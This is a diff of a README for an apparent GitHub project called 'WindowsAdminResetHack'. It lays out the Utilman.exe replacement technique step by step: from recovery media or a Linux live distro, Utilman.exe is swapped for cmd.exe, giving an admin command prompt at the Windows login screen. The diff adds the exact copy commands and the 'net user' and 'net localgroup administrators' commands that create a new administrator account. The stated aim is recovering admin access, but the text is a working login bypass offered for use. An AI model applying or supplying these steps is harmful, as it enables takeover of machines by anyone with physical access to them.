Michael-Free/WindowsAdminResetHack/README.md

           - `move C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.exe.backup`
      - If this is a Linux Live Distro:
           - `mv /mnt/harddrive/Windows/System32/Utilman.exe /mnt/harddrive/Windows/System32/Utilman.exe.backup`
-3. Copy C:\Windows\System32\cmd.exe to C:\Windows\System32\Utilman.exe
+3. Copy cmd.exe as Utilman.exe in the system32 folder
+     - If this is Windows 10 Recovery Media:
+          - `copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe`
+     - If this is a Linux Live Distro:
+          - `cp /mnt/harddrive/Windows/System32/cmd.exe /mnt/harddrive/Windows/System32/Utilman.exe`
 4. Reboot the computer and remove the boot media just used.
 5. When the Login Screen appears - click on the Ease of Access icon in the bottom right-hand corner
+     - YOU NOW HAVE AN ADMIN COMMAND PROMPT!
-6. Create a user for yourself on the command prompt
+6. Create a user for yourself on the command prompt.
+     - `net user <username> <password> /add`
+     - `net localgroup administrators <username> /add`
+     -
 7. Log into Windows using the username just created.
 8. Add the user account that doesn't have Admin access to the Administrators local group
 9. Clean up after yourself!